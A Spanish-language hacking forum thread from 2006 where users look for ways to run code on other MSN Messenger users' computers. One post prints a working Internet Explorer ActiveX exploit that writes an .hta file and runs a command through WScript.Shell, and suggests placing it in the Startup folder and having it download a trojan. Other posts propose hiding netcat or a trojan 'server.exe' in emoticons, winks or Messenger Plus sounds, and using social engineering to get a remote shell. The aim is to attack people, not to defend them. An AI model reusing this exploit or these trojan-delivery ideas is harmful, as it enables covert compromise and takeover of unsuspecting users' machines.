elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 18:23  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Posible Bug En Messenger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Imprimir
Autor Tema: Posible Bug En Messenger  (Leído 5002 veces)
D_pit_88

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Posible Bug En Messenger
« Respuesta #30 en: 08 Septiembre 2006, 12:21 »

seguimos en la investigación buscando vulnerabilidades después de un tiempo de pausa seguimos hay grandes logros que iré comunicando ... lo malo es que nos petan el cacas con las nuevas versiones joder Mocosoft tiene dinero para coserse los trajes ...

NECESITAMOS AYUDA¡¡¡¡ Agregarme al messenger haber que podemos hacer por sonido tambien se nos habre un abanico el messenger plus otro...
« Última modificación: 09 Septiembre 2006, 01:44 por Sdc » En línea

Linux Es debido a la deficiencia de windows
eloko

Desconectado Desconectado

Mensajes: 176



Ver Perfil
Re: Posible Bug En Messenger
« Respuesta #31 en: 02 Octubre 2006, 23:52 »

pero la firma digital tiene que ser necesariamente de microsoft?
En línea

Intel Core 2 Duo E4300 & BigTyphoon 1800Mhz@3600Mhz @ 24/7 2.88ghz
Corsair Value 2x1gb 5-5-5-12 2t 1.8v 667mhz@870mhz @ 6-5-5-5-12 2t 948mhz 2.1v
MSI P35 Platinium Bios v1.3
XFX 7900GT 256MB 1.4ns & Zalman VF-900cu 520/750 1.2v
WD 160gb 8mb buffer 7200RPM SataII
ThermalTake Toughpower 750w W0117 12vx4 18Ax4
LG GSA-H62N 18x Sata DVD-RW
ViewSonic E70F+ UltraBrit 17”

GNU/Linux Debian Lenny
WHK

Desconectado Desconectado

Mensajes: 832


+-=[Yan]=-+


Ver Perfil WWW
Re: Posible Bug En Messenger
« Respuesta #32 en: 05 Noviembre 2006, 04:18 »

Talvez puedan probar con un exploit muy antiguo que hace ejecutar algo al que abria una pagina web...
este exploit fue muy masivo pero hoy en dia el iexplorer dice si kieres dejar pasar el script y despues si kieres dejar pasar el contenido activo...
si el html proviene desde internet simplemente no te deja ejecutar nda porque sale un mensaje que es altamente dañina la pagina que estas viendo.
taalves esto se omita en el messenger... prueben ustedes porque yo re100 estuve viendo el foro y aún no he hecho ninguna prueva, ademas como no uso el msn no tengo ni idea donde están esas animaciones :p, pero bueno... el exploit dice así:


<html>

<OBJECT id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14" >
</OBJECT>

<script>
scr.Reset();
scr.Path="C:\\winmem.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('command /c notepad.exe',false,6)</"+"SCRIPT>";scr.write();
</script>
</body>
</html>



si lo guardas como index.html o htm y lo abres podrás ver que se crea un archivo winmem.hta en c:\ y que se considera ejecutable... al abrirlo se ejecuta el notepad.... yo lo hice de esa forma para dar un ejemplo pero pueden hacer que descargue un server oo algo asi de alguna parte o modificando el winmem.hta puede funcionar como troyano mismo.

pueden dar la direccion de %homepath%\menú inicio\programas\inicio y una segunda url %homepath%\(todo lo demas pero en ingles)

y de esa forma se ejecuta solo cuando buelvan a iniciar secion en la makina.

hay un exploit para yahoo que mandando cierto texto a una persona (script) en el area del mensage podían joderles el mensajero, abrirles url remotamente o incluso hacer que se ejecuten cosas solas... por ejemplo yo escribo a juanito (texto que no me acuerdo :p) y hace que mi server que está en mi escritorio le llegue a juanito y se abra sin que el sepa... talvez con la llegada del live messenger que hace posible la compatibilizacion entre yahoo y hotmail puedan hacer algo para hot asi como para yahoo... o modificar este exploit para que se haga efectivo en hot... la idea es que si se puede pero son pocos los que saben y los que saben no kieren decirlo porque si se hace demasiado publico den por echo que saldrá algun parche.
(el exploit está en la pagina http://yahoo-sux.com/site/modules/news/)
en que mas podría ayudarles???..mmmmm....
lo de las firmas... de la misma forma que microsoft hace las firmas deve tambien poderse para nosotros no?
todo esto es digital men! digitos solamente con ordenes de ejecución... HAY POR AQUÍ ALGÚN CAPO EN PROGRAMACIÓN O EN EDICIONES HEXAGECIMALES!!!???  :-( :P
Pero bueno.... creo que la ingeniería social es mas facil jijijiji por ejemplo si fuera yo... solo haría que me aceptara algo la otra persona y al ejecutarlo me da su shell y con eso estoy listo  ::)
En línea

-The Hacktivism is not a crimen.
- Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática.
- Richard Stallman: "GNU (GNU No es Unix)".
- Mi web: https://sourceforge.net/projects/whkfilemanager/ - http://www.jccharry.com/ (Actualizando)
MaNoRoTH

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: Posible Bug En Messenger
« Respuesta #33 en: 12 Noviembre 2006, 14:42 »

Hay muchas opciones para hacer que la otra persona baje "algo" :rolleyes: una que estoy mirando un poco mas a fondo es la de los sonidos de messenger plus dado que lleva una opción "descargar nuevo sonido" y hay algunos que se nota muchisimo que son subidos por personas particulares lo que no se es como  :huh: sabiendo como subirlo se podría mezclar el server.exe con el sonido aunque eso no tengo certeza de que se pueda  :-\ , y ahora tambien estan empezando a usarse los avatares animados de Mocosoft no permite usar gifs sino que usa archivos con extension .MCO tambien ... todo es plan de buscar...
En línea
wACtOr

Desconectado Desconectado

Mensajes: 323


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Posible Bug En Messenger
« Respuesta #34 en: 21 Noviembre 2006, 18:19 »

wenas a ver, hace tiempo encontre un programa : MSN Paraiso

Desde aki te autoinstalas guiños, avatares, skin, etc etc

bien, estos guiños no son de microsoft, creo, con lo cual los chicos de bluemontain << la pagina de los creadores del programa, tienen que aver firmado esos winks no??,

aora mismo estoy estudiandolo, aver si sale algo weno

saludos
En línea


SeniorX

Desconectado Desconectado

Mensajes: 1.327


Programador Novato


Ver Perfil WWW
Re: Posible Bug En Messenger
« Respuesta #35 en: 21 Noviembre 2006, 19:56 »

Para subir un sonido de msn no es nada especial.
Hay que tener instalado el plus.
Le das a plus/libreria de sonidos y luego, agregar uno nuevo... nada +.
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
DSiGN3r

Desconectado Desconectado

Mensajes: 517



Ver Perfil
Re: Posible Bug En Messenger
« Respuesta #36 en: 25 Noviembre 2006, 03:41 »

Existe la posibilidad de hacer tus propios guiños y funcionan al 100%. Lo estuve mirando en una web pero no me acuerdo cual era. Hubo una temporada que me interesé mucho por el tema este de los guiños por que estaban hechos con flash... Pues bién yo de flash si que piloto algo, aver si cuando tenga un ratillo miro aver como esta el tema...

y el tema está como han dicho en getURL()  ;)
En línea

muu

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: Posible Bug En Messenger
« Respuesta #37 en: 29 Noviembre 2006, 03:59 »

podrias crear tu propio emoticon y como el envio no tiene tamaño maximo podrias adjuntar el netcat y despues usarlo como troyano y crear una bomba logica que venga con el archivo para que el netcat se compile y se active como troyano esa fue una idea que se me ocurrio mientraas leia sus post espero que les sea de utilidad saludos de parte de muu
En línea

Pienso luego existo
Compilo Luego Existo
D_pit_88

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Posible Bug En Messenger
« Respuesta #38 en: 05 Diciembre 2006, 12:23 »

Claro y emos consegido poner en funcinamiento un flas nuestro pero muchos petan y al subirlo solo lo vemos nosotros ... seguimos probando pero hemos hecho avances muy interesantes ...
En línea

Linux Es debido a la deficiencia de windows
Páginas: 1 2 [3] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC